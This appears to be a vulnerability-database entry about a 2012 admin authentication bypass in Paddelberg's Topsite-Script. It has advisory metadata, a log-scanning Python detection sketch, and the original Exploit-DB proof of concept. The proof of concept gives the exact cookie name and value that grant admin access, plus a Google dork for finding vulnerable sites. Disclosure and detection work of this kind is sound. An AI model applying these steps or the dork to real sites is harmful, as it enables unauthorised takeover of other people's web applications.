Vendor: Topsite-Script
By: Christian Inci
CVSS: 7.5 (HIGH)
Authentication Bypass
CWE: 287 (Authentication Bypass)
Product Name: Topsite-Script
Affected Version From: <= 1.23
Affected Version To: <= 1.23
Patch Exists: NO
Related CWE: None
CPE: paddelberg:topsite-script
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: 1.23
Year: 2012

Paddelberg’s topsite-script admin auth bypass

This exploit allows an attacker to bypass authentication on the admin page of Paddelberg's topsite-script. The attacker creates a cookie for the target host name and admin path name, with the cookie name set to 'xxxtopa' and the cookie value set to ':'. The attacker then visits the admin page and gains access to it without authenticating.

Mitigation:

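Ensure that authentication is properly implemented and enforced. No patch exists for the affected versions; the advisory below notes that the bypass does not work when the admin directory is protected with a .htaccess file.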
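Since no patch exists, operators can look for this bypass in their web server logs. The following detection sketch is an added example, not part of the original advisory or the project's code; it assumes an Apache combined log with the request's Cookie header appended as a final quoted field (`%{Cookie}i`), and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Assumed log layout (not from the advisory): Apache combined format with the
# request's Cookie header appended as a final quoted field via %{Cookie}i.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "[^"]*" "(?P<cookie>[^"]*)"$'
)
COOKIE_NAME = "xxxtopa"   # cookie name given in the advisory
BYPASS_VALUE = ":"        # cookie value given in the advisory

# Constructed sample lines (documentation IP ranges, hypothetical /toplist/ base path).
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Jan/2012:10:15:02 +0100] "GET /toplist/admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "xxxtopa=:"',
    '198.51.100.7 - - [08/Jan/2012:10:15:09 +0100] "GET /toplist/admin/index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0" "lang=de; xxxtopa=%3A"',
    '203.0.113.20 - - [08/Jan/2012:10:16:40 +0100] "GET /toplist/admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "xxxtopa=constructed-other-value"',
    '203.0.113.21 - - [08/Jan/2012:10:17:00 +0100] "GET /toplist/index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0" "xxxtopa=:"',
    '203.0.113.22 - - [08/Jan/2012:10:18:00 +0100] "GET /toplist/admin/ HTTP/1.1" 401 300 "-" "Mozilla/5.0" "-"',
]


def parse_cookies(header):
    """Split a Cookie header into (name, URL-decoded value) pairs."""
    pairs = []
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name.strip(), unquote(value.strip())))
    return pairs


def find_bypass_attempts(lines, admin_marker="/admin/"):
    """Return (ip, timestamp, path, status) for admin requests carrying the bypass cookie."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or admin_marker not in m.group("path"):
            continue
        for name, value in parse_cookies(m.group("cookie")):
            if name == COOKIE_NAME and value == BYPASS_VALUE:
                hits.append((m.group("ip"), m.group("ts"), m.group("path"), int(m.group("status"))))
                break
    return hits
```

A hit with a 2xx status on the admin path means the cookie was accepted; a 401 or 403 on the same request indicates the directory is protected at the web server level.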
Source

Exploit-DB raw data:

# Exploit Title: Paddelberg's topsite-script admin auth bypass.
# Google Dork: intext:"powered by php scripte webmaster resource"
# Date: 8. 1. 2012
# Author: Christian Inci
# Software Link: http://www.paddelberg.de/gratis-toplisten-script/gratis-download/
# Version: <= 1.23 (22. 9. 2007)
# Tested on: 1.23
# Vendor response: None, as I didn't contact them.

PoC/Exploit:
1.: Open a random cookie editor.
2.: Create a cookie, as usual:
  2.1: Set the host name.
  2.2: Set the path name. (e.g.: "[script-base-path]/admin/")
  2.3: Set the cookie name to "xxxtopa".
  2.4: Set the cookie value to ":".
  2.5: Save it.
3.: Visit the following URL: "[script-base-url]/admin/". (This won't work if the directory is "protected" with a .htaccess file.)
4.: Do whatever you like to do here. (Have fun!)